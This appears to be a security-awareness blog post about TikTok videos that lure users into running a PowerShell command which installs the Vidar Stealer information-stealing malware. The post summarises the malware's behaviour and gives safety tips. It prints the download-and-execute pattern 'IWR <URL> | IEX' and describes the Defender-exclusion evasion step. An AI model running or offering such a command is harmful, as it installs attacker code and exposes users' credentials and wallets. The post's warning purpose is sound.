Cracked Software on TikTok: A Malware Warning

Cracked Software on TikTok: A Malware Warning

Social media platforms can be dangerous. A recent trend on TikTok involves accounts promoting cracked software for popular applications like ChatGPT, Office 365, and Adobe products. While these videos promise free access to premium tools, they often lead to malware installation.

The Danger of Unverified PowerShell Scripts

The method used in these TikTok videos involves instructing users to open PowerShell via the Run dialog box (Windows key + R) and execute a command that downloads and runs code from the internet. This command typically uses IWR (an alias for Invoke-WebRequest) to download content and pipes it to IEX (an alias for Invoke-Expression), which executes the downloaded code.

IWR <URL> | IEX

This approach is dangerous because it executes arbitrary code on your computer without you knowing what it's actually doing. In many cases, it leads to the installation of malware.

It can be argued that users often do not examine the scripts they are told to run. The command itself is designed to bypass security checks. The server hosting the malicious code often verifies that the request is coming from PowerShell by checking the user agent. This prevents direct access through a web browser and forces users to execute the script. One could ask the question whether this is an adequate way to prevent this. The development shows that it is not.

Analyzing the Malware: Vidar Stealer

Security researchers have analyzed the malware distributed through these TikTok videos and identified it as Vidar Stealer, an information-stealing malware. Vidar Stealer targets a wide range of data, including:

• Passwords stored in web browsers
• Cookies
• Auto-filled data (addresses, bank information, credit card details)
• Browsing history
• Cryptocurrency wallets

The malware collects this information, bundles it up, and sends it to a remote server controlled by the attacker. This stolen data can then be used for various malicious purposes, including identity theft, financial fraud, and account hijacking.

Technical Details: Golang and Obfuscation

The downloaded executable is often written in Golang, a programming language known for its efficiency and cross-platform compatibility. Malware authors sometimes use Golang to make reverse engineering more difficult. The code often employs techniques like Base64 encoding and hidden folders to obfuscate its activities and evade detection by antivirus software.

For example, the malware may create a hidden folder in the local app data directory and add an exclusion to Windows Defender to prevent it from being scanned.

Dynamic Analysis: Unveiling the Malware's Behavior

While static analysis of the Golang code can be challenging, dynamic analysis (running the malware in a controlled environment) reveals its true behavior. Online sandboxes like Any.Run allow researchers to safely execute malware and observe its actions.

Analysis of the Vidar Stealer sample revealed that it:

• Communicates over UDP network
• Spawns a child process called "BitLocker To Go"
• Steals credentials from web browsers (Chrome, Opera, Thunderbird, etc.)
• Enumerates installed software
• Communicates with a Telegram account controlled by the attacker

Staying Safe: Protect Yourself from Malware

To protect yourself from malware distributed through social media, follow these guidelines:

• Be skeptical of offers for free software or tools. If something seems too good to be true, it probably is.
• Avoid running PowerShell scripts from untrusted sources. Carefully examine the code before executing it.
• Keep your antivirus software up to date. A good antivirus program can detect and block many types of malware.
• Report suspicious accounts and videos on social media. By reporting malicious content, you can help protect others from falling victim to scams.

Which path do we want to take? With caution and awareness, users can mitigate the risks and enjoy the benefits of technology without compromising their security and privacy.

Comments are closed.